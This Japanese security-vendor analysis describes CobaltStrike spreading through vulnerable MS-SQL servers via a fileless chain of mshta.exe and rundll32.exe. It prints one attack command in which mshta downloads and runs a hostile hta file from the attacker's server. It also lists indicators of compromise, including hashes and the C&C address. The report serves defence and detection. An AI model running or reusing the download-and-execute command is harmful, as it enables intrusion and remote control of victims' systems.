脆弱な MS-SQL サーバーをターゲットに拡散している CobaltStrike(2)

2月23日、ASEC 分析チームは脆弱な MS-SQL サーバーによって CobaltStrike が拡散している情報を共有した。

https://asec.ahnlab.com/jp/32036/

今回の事例では、当時の配布方式とは異なるプロセスツリー構造を持つ形式の CobaltStrike を配布する状況を確認した。確認された配布方式は MS-SQL サーバー関連のプロセスである sqlservr.exe が脆弱性によって cmd.exe を実行するところまでは同じだが、その後 mshta.exe と rundll32.exe を利用してメモリ上でファイルレス形式で CobaltStrike を実行する点が異なっている。

[図1] CobaltStrike の実行ツリーの構造

攻撃者は MS-SQL の脆弱性によって実行された cmd.exe によって mshta.exe プロセスを実行した。mshta.exe は正常な Windows ユーティリティであり、Java スクリプト、Visual Basic スクリプトの実行および URL を直接渡して hta ファイルを実行する機能を行う。今回の事例の場合、URL を以下のように mshta プロセスの引数値として渡し、攻撃者サーバーから不正な hta ファイルをダウンロードして実行していた。

  • mshta.exe http[:]//114.132.246[.]102:1222/bobo.png
[図2] bobo.png(hta ファイル)

ダウンロードされた hta は CobaltStrike のペイロード(Stager)が含まれた xsl スクリプトを攻撃者サーバーからダウンロードして実行する機能を行う。

[図3] bobo.xsl スクリプトコードの一部

この xsl スクリプトが実行されると、rundll32.exe に CobaltStrike(Stager)をインジェクションして実行する。その後 C&C サーバーからビーコンがダウンロードされ、様々な遠隔操作コマンドが実行できるようになる。

[図4] CobaltStrike の設定ファイル

AhnLab V3 製品では、当該タイプに対して以下の通り検知している。

[IOC]
[hta スクリプト]
(MD5、検知名、エンジンバージョン)
– 591ec011ec21d1a3a05863e72910c55f (Downloader/JS.Agent) 2022.02.16.00

[xsl スクリプト]
(MD5、検知名、エンジンバージョン)
– dab62efb57014b0508fa1a8ff10b736a (Trojan/JS.Scriptinject.S1252) 2020.07.11.00

[C&C サーバー]
– 114.132.246[.]102
– hxxp://114.132.246[.]102:1222/bobo.png
– hxxp://114.132.246[.]102:1222/bobo.xsl

0 0 votes
評価する
guest
0 コメント
Inline Feedbacks
View all comments